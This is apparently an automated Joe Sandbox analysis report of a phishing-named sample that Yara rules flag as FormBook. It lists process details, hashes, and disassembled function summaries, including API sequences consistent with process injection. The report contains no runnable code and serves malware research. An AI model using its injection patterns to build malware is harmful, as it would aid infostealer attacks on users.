00000005.00000002.3761586169.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	04:53:17
Start date:	13/01/2025
Path:	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe"
Imagebase:	0x570000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3761974191.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3761974191.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	04:53:29
Start date:	13/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff722870000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.7%
Dynamic/Decrypted Code Coverage:	1.1%
Signature Coverage:	3.3%
Total number of Nodes:	1654
Total number of Limit Nodes:	30

Executed Functions

Function 009342DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0093430D

Part of subcall function 00936B57: _wcslen.LIBCMT ref: 00936B6A

GetCurrentProcess.KERNEL32(?,009CCB64,00000000,?,?), ref: 00934422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00934429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00934454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00934466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00934474
FreeLibrary.KERNEL32(00000000,?,?), ref: 0093447B
GetSystemInfo.KERNEL32(?,?,?), ref: 009344A0

Strings

|O, xrefs: 009736F8
GetNativeSystemInfo, xrefs: 00934460
kernel32.dll, xrefs: 0093444F

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: b6b3432ff1a00773be336ba11866528ba4552a561dd78a75a39a9715be32d26a
Instruction ID: b7ca3779e47c20b991f89c59025a36eff7bdd876b050781650df36026e096dec
Opcode Fuzzy Hash: b6b3432ff1a00773be336ba11866528ba4552a561dd78a75a39a9715be32d26a
Instruction Fuzzy Hash: 9FA1B66291E2C8DFC795C7E97C856D57FE87B26300F0898A9E0459BA32D2245907EF23

Function 009342A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,009350AA,?,?,00000000,00000000), ref: 009342B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,009350AA,?,?,00000000,00000000), ref: 009342C9
LoadResource.KERNEL32(?,00000000,?,?,009350AA,?,?,00000000,00000000,?,?,?,?,?,?,00934F20), ref: 009735BE
SizeofResource.KERNEL32(?,00000000,?,?,009350AA,?,?,00000000,00000000,?,?,?,?,?,?,00934F20), ref: 009735D3
LockResource.KERNEL32(009350AA,?,?,009350AA,?,?,00000000,00000000,?,?,?,?,?,?,00934F20,?), ref: 009735E6

Strings

SCRIPT, xrefs: 009342BF

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 2f221e9e43f6ff91a049390f60fdb07d746e74eb68c770a0604f5cc7b60bae43
Instruction ID: e05f1567cfb775a32bf47a41f67b14aeaddb1984e8ea519ed3545139843fd1bb
Opcode Fuzzy Hash: 2f221e9e43f6ff91a049390f60fdb07d746e74eb68c770a0604f5cc7b60bae43
Instruction Fuzzy Hash: 93117CB1600700BFD7218BA6DC48F277BBDEBCAB51F158169F42A96690DB71EC009A20

Function 00972BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00932B6B

Part of subcall function 00933A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A01418,?,00932E7F,?,?,?,00000000), ref: 00933A78

Part of subcall function 00939CB3: _wcslen.LIBCMT ref: 00939CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,009F2224), ref: 00972C10
ShellExecuteW.SHELL32(00000000,?,?,009F2224), ref: 00972C17

Strings

runas, xrefs: 00972C0B

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: c1a13c4f39f78d26fdc1183311855a311d62ff403cf3e53c2d1436198ee25c18
Instruction ID: 1cb398253d25649e4b12011242806a9d8947b166b0fe3d59383f615b6049b201
Opcode Fuzzy Hash: c1a13c4f39f78d26fdc1183311855a311d62ff403cf3e53c2d1436198ee25c18
Instruction Fuzzy Hash: AE11B6716483456AC718FF70E851FBEBBA8AFD2350F44942DF186520A2DF718A4ADF12

Function 0093D730 Relevance: 21.6, APIs: 14, Instructions: 619windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0093D807
timeGetTime.WINMM ref: 0093DA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0093DB28
TranslateMessage.USER32(?), ref: 0093DB7B
DispatchMessageW.USER32(?), ref: 0093DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0093DB9F
Sleep.KERNEL32(0000000A), ref: 0093DBB1

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: ffe0d602322e1ecc3f6e4ff21507f5d10191f672abe9bd5b5855d4b49e42b5c9
Instruction ID: ba9c3baed57eb96c3ee058527375fafea745ae4cd85f0e1d9fbc8bd00daabd28
Opcode Fuzzy Hash: ffe0d602322e1ecc3f6e4ff21507f5d10191f672abe9bd5b5855d4b49e42b5c9
Instruction Fuzzy Hash: 7842E07060A341DFD728DF24D8A4BAAB7E8BF86304F14895DE49687391D774E845CF82

Function 00932CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00932D07
RegisterClassExW.USER32(00000030), ref: 00932D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00932D42
InitCommonControlsEx.COMCTL32(?), ref: 00932D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00932D6F
LoadIconW.USER32(000000A9), ref: 00932D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00932D94

Strings

+, xrefs: 00932CF0
TaskbarCreated, xrefs: 00932D37
AutoIt v3 GUI, xrefs: 00932D23
0, xrefs: 00932CE9

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: cf63a9704118d0a294b4e5d007404123e4ac0dbbd55d7dd213a404bfac628bb5
Instruction ID: fd673590ddc436c9c6bbf5a9d47c18ece99b6ac94484dbbff5380d0b4bdf6e6a
Opcode Fuzzy Hash: cf63a9704118d0a294b4e5d007404123e4ac0dbbd55d7dd213a404bfac628bb5
Instruction Fuzzy Hash: 7021AEB5D15318AFDB00DFE4E889BDDBFB4FB08744F00811AE615A62A0D7B146469F91

Function 0097065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0097039A: CreateFileW.KERNELBASE(00000000,00000000,?,00970704,?,?,00000000,?,00970704,00000000,0000000C), ref: 009703B7

GetLastError.KERNEL32 ref: 0097076F
__dosmaperr.LIBCMT ref: 00970776
GetFileType.KERNELBASE(00000000), ref: 00970782
GetLastError.KERNEL32 ref: 0097078C
__dosmaperr.LIBCMT ref: 00970795
CloseHandle.KERNEL32(00000000), ref: 009707B5
CloseHandle.KERNEL32(?), ref: 009708FF
GetLastError.KERNEL32 ref: 00970931
__dosmaperr.LIBCMT ref: 00970938

Strings

H, xrefs: 009708BD

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 46804ff9d4e1721b0cc7b9dcc436e71b76c9a08ab564dc3b8402b187726ddd55
Instruction ID: 2bfdf69c84b4cc14cc2b0733e58c75540b54d918a00085bcfec2a24e73786df5
Opcode Fuzzy Hash: 46804ff9d4e1721b0cc7b9dcc436e71b76c9a08ab564dc3b8402b187726ddd55
Instruction Fuzzy Hash: 49A13533A14149CFDF19EF68DC61BAE3BA4AB86320F14815DF8199B291CB319813DB91

Function 0093344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00933A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A01418,?,00932E7F,?,?,?,00000000), ref: 00933A78

Part of subcall function 00933357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00933379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0093356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0097318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009731CE
RegCloseKey.ADVAPI32(?), ref: 00973210
_wcslen.LIBCMT ref: 00973277
_wcslen.LIBCMT ref: 00973286

Strings

Software\AutoIt v3\AutoIt, xrefs: 00933560
Include, xrefs: 00973184, 009731C5
\, xrefs: 0097328C
\Include\, xrefs: 00933527

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: f4d38cc32bf33e67714a949cc76b84a4233e080f45652b09e6db7ef76ab10744
Instruction ID: 7d49a89eabf4528a7c352202e8176fbedcec56fe32e8530643a55d9e6a75b6c1
Opcode Fuzzy Hash: f4d38cc32bf33e67714a949cc76b84a4233e080f45652b09e6db7ef76ab10744
Instruction Fuzzy Hash: 6C71A1714083059EC314DFA5EC96A5BBBE8FFD4340F40882EF5899B1A1DB749A4ACB52

Function 00932B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00932B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00932B9D
LoadIconW.USER32(00000063), ref: 00932BB3
LoadIconW.USER32(000000A4), ref: 00932BC5
LoadIconW.USER32(000000A2), ref: 00932BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00932BEF
RegisterClassExW.USER32(?), ref: 00932C40

Part of subcall function 00932CD4: GetSysColorBrush.USER32(0000000F), ref: 00932D07
Part of subcall function 00932CD4: RegisterClassExW.USER32(00000030), ref: 00932D31
Part of subcall function 00932CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00932D42
Part of subcall function 00932CD4: InitCommonControlsEx.COMCTL32(?), ref: 00932D5F
Part of subcall function 00932CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00932D6F
Part of subcall function 00932CD4: LoadIconW.USER32(000000A9), ref: 00932D85
Part of subcall function 00932CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00932D94

Strings

#, xrefs: 00932C16
AutoIt v3, xrefs: 00932C2F
0, xrefs: 00932C0F

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 5f3c31c804ab0cb44d38d4f60318ee8c3b9ad79bb9951262376694448b852a2f
Instruction ID: daa45c22ce0b1e8ce566b90fe141a293d85065c65ee625d47d1400e8b7c875ac
Opcode Fuzzy Hash: 5f3c31c804ab0cb44d38d4f60318ee8c3b9ad79bb9951262376694448b852a2f
Instruction Fuzzy Hash: F82125B0E10318ABDB50DFE5EC59EE97FF4FB48B54F04001AF504AA6A0D3B106429F91

Function 00933170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0093316A,?,?), ref: 009331D8
KillTimer.USER32(?,00000001,?,?,?,?,?,0093316A,?,?), ref: 00933204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00933227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0093316A,?,?), ref: 00933232
CreatePopupMenu.USER32 ref: 00933246
PostQuitMessage.USER32(00000000), ref: 00933267

Strings

TaskbarCreated, xrefs: 0093322D

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 13f3819996204d09f958e89b2ae97687b391077f4facb428897a745a93784995
Instruction ID: 31f41875d8289dce0dbda389e317fdf4b845801b35b32baadd140fab31f15731
Opcode Fuzzy Hash: 13f3819996204d09f958e89b2ae97687b391077f4facb428897a745a93784995
Instruction Fuzzy Hash: 14417D756D8208ABDF145BBCDC0DBBA3A1DEB45340F04C125F51A861E1D7798E429F61

Function 01315FA0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01316071
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01316297

Memory Dump Source

Source File: 00000000.00000002.1320204766.0000000001313000.00000040.00000020.00020000.00000000.sdmp, Offset: 01313000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1313000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 1376b1c019e97a58b345df4903236ecb5f0b8c205347a8d20aa61bd2a2b0f564
Instruction ID: 93064d95e679e96d834db568ed3ca7bb1470758158453c5ef95017d2893587fe
Opcode Fuzzy Hash: 1376b1c019e97a58b345df4903236ecb5f0b8c205347a8d20aa61bd2a2b0f564
Instruction Fuzzy Hash: 9AA108B0E00209EBDB18CFE4C895BEEBBB5BF48308F208159E505BB285C7B59A45CB54

Function 00932C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00932C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00932CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00931CAD,?), ref: 00932CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00931CAD,?), ref: 00932CCF

Strings

edit, xrefs: 00932CAC
AutoIt v3, xrefs: 00932C89, 00932C8E, 00932C8F

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 56be1a94e37840e7a7629b285f7a86685e568c276673c33c53e6bd86776ae3d6
Instruction ID: d44e11aae17a94f20e9701a8e67ce361d78ba172403af32d28ddd2fd4942aecb
Opcode Fuzzy Hash: 56be1a94e37840e7a7629b285f7a86685e568c276673c33c53e6bd86776ae3d6
Instruction Fuzzy Hash: 2EF0DAB99403987AEB715757AC0CEB72EBDD7C6F50B00105EF904AA5A0C6711853DAB2

Function 01315D00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01315BF0: Sleep.KERNELBASE(000001F4), ref: 01315C01

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01315E88

Strings

MIEDDS2SZWW0YBO63G1UNIN4P7, xrefs: 01315EF4, 01315EF7

Memory Dump Source

Source File: 00000000.00000002.1320204766.0000000001313000.00000040.00000020.00020000.00000000.sdmp, Offset: 01313000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1313000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CreateFileSleep
String ID: MIEDDS2SZWW0YBO63G1UNIN4P7
API String ID: 2694422964-1835015415
Opcode ID: 5c5fc757218630798aa3e5186767e63dcf8269c3a1241e4281f1d9309b653935
Instruction ID: a53dcc73c8dbe4a1d324f4a8c1243488773f54b0cf0baa1a6d0b74eeed3a0b50
Opcode Fuzzy Hash: 5c5fc757218630798aa3e5186767e63dcf8269c3a1241e4281f1d9309b653935
Instruction Fuzzy Hash: 3D718530D1428DDAEF15DBE8C8547EEBB75AF55304F004199E248BB2C0D7BA0B49CB66

Function 00933B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00933B0F,SwapMouseButtons,00000004,?), ref: 00933B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00933B0F,SwapMouseButtons,00000004,?), ref: 00933B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00933B0F,SwapMouseButtons,00000004,?), ref: 00933B83

Strings

Control Panel\Mouse, xrefs: 00933B3E

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: e9beb4bd48c9e20eba7aebe0e9de328513f0507b39a1304888a682ea1d791739
Instruction ID: 6ee2d2377a4f2d9213431838c9493d12747995d7ba0129210f18743cd7fea92a
Opcode Fuzzy Hash: e9beb4bd48c9e20eba7aebe0e9de328513f0507b39a1304888a682ea1d791739
Instruction Fuzzy Hash: BB112AB5560208FFDB20CFA5DC44EBEBBBDEF05744F108959E805D7110D2319E40AB60

Function 01314BF0 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 013153AB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01315441
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01315463

Memory Dump Source

Source File: 00000000.00000002.1320204766.0000000001313000.00000040.00000020.00020000.00000000.sdmp, Offset: 01313000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1313000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: c0ad486130d49f660041ec3590232533ce3f2fb627d0ccbb7959fe58ca93e62d
Instruction ID: 317ca09df37b170b6e4bd558f095d8191f31a54eb559bbc5fd0763f25c1fb5fc
Opcode Fuzzy Hash: c0ad486130d49f660041ec3590232533ce3f2fb627d0ccbb7959fe58ca93e62d
Instruction Fuzzy Hash: FB622D30A14218DBEB24DFA4C841BDEB776EF98304F1091A9D20DEB394E7759E81CB59

Function 0093DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 009832B7

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
